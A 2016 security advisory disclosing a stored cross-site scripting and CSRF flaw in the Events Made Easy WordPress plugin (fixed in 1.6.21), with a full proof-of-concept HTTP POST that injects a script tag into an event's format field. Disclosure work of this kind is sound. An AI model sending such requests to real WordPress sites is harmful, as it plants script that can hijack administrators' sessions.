------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Events Made Easy WordPress plugin
------------------------------------------------------------------------
Job Diesveld, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability has been found in the Events Made
Easy WordPress plugin. By using this issue an attacker can create a
specially crafted event which, when posted to WordPress, injects
malicious JavaScript code into the application. This code will execute
within the browser of any user who views the relevant application
content. 

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160729-0001

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been fixed in Events Made Easy [2] plugin version 1.6.21.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Events Made Easy [3] plugin
version 1.6.20.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The WordPress Events Made Easy [3] plugin is a full-featured event
management solution for WordPress. It supports public, private, draft
and recurring events, locations management, RSVP (+ optional approval),
Paypal, 2Checkout, FirstData and Google maps.

Upon adding a new Events Made Easy event within the WordPress admin
interface, the plugin allows script code to be added to among others the
Single Event Format textbox. The plugin insufficiently checks the nonces
closedpostboxesnonce and meta-box-order-nonce when the event is posted
to the server, nor is any other nonce employed to prevent CSRF from
occurring. If an attacker can lure a WordPress admin into posting an
event with malicious script code, this code is subsequently stored in
the application and can be used to perform a wide variety of actions,
such as stealing victims' session tokens or login credentials,
performing arbitrary actions on their behalf, and logging their
keystrokes.

https://sumofpwn.nl/advisory/2016/poc-1.png

------------------------------------------------------------------------
Proof of Concept
------------------------------------------------------------------------
The following request can be used to create an event containing
JavaScript that will obtain the cookie of the current user:


POST
/wp-admin/admin.php?page=events-manager&eme_admin_action=update_event&event_id=16
HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0)
Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: <session cookies>
Connection: close
Content-Type: multipart/form-data;
boundary=---------------------------224523339434990794855940370
Content-Length: 8579
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_status"
	
5
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_contactperson_id"
	
-1
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_seats"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="price"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="currency"
	
EUR
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_max_allowed"
	
10
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_min_allowed"
	
1
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_rsvp_discount"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_rsvp_discountgroup"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="rsvp_number_days"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="rsvp_number_hours"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_rsvp_end_target"
	
start
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_name"
	
fooname
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_slug"
	
fooname
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="localised_recurrence_date"
	
07/29/2016
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_start_date"
	
2016-07-29
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="localised_recurrence_end_date"
	
07/29/2016
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_end_date"
	
2016-07-29
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_freq"
	
daily
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_interval"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_byweekno"
	
1
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_byday"
	
1
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="localised_event_start_date"
	
07/29/2016
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_start_date"
	
2016-07-29
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="localised_event_end_date"
	
07/29/2016
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_end_date"
	
2016-07-29
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_start_time"
	
01:22PM
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_end_time"
	
01:22PM
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_page_title_format_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_page_title_format"
	
lalalala
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_single_event_format_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_single_event_format"
	
<p>#_STARTDATE -
#_STARTTIME</p><p>#_TOWN</p><p>#_NOTES</p><p>#_ADDBOOKINGFORM</p><p>#_MAP</p><script>alert(document.cookies)</script>
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_contactperson_email_body_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_contactperson_email_body"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_registration_recorded_ok_html_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="event_registration_recorded_ok_html"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_respondent_email_body_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_respondent_email_body"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_registration_pending_email_body_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="event_registration_pending_email_body"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_registration_updated_email_body_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="event_registration_updated_email_body"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_registration_cancelled_email_body_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="event_registration_cancelled_email_body"
	
Dear #_RESPNAME,
	
Your request to reserve #_RESPSPACES space(s) for #_EVENTNAME has been
cancelled.
	
Yours faithfully,awfe
#_CONTACTPERSON
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_registration_denied_email_body_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="event_registration_denied_email_body"
	
Dear #_RESPNAME,
	
Your request to reserve #_RESPSPACES space(s) for #_EVENTNAME has been
denied.
	
Yours faithfully,
#_CONTACTPERSONawef
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_registration_form_format_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_registration_form_format"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_cancel_form_format_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_cancel_form_format"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_name"
	
piet
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_address"
	
kaas
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_town"
	
foo
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_latitude"
	
57.198
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_longitude"
	
9.67063
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="content"
	
gold
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_image_url"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_image_id"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_url"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_update_button"
	
Update »
-----------------------------224523339434990794855940370
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_events_made_easy_wordpress_plugin.html
[2] https://downloads.wordpress.org/plugin/events-made-easy.1.6.21.zip
[3] https://wordpress.org/plugins/events-made-easy/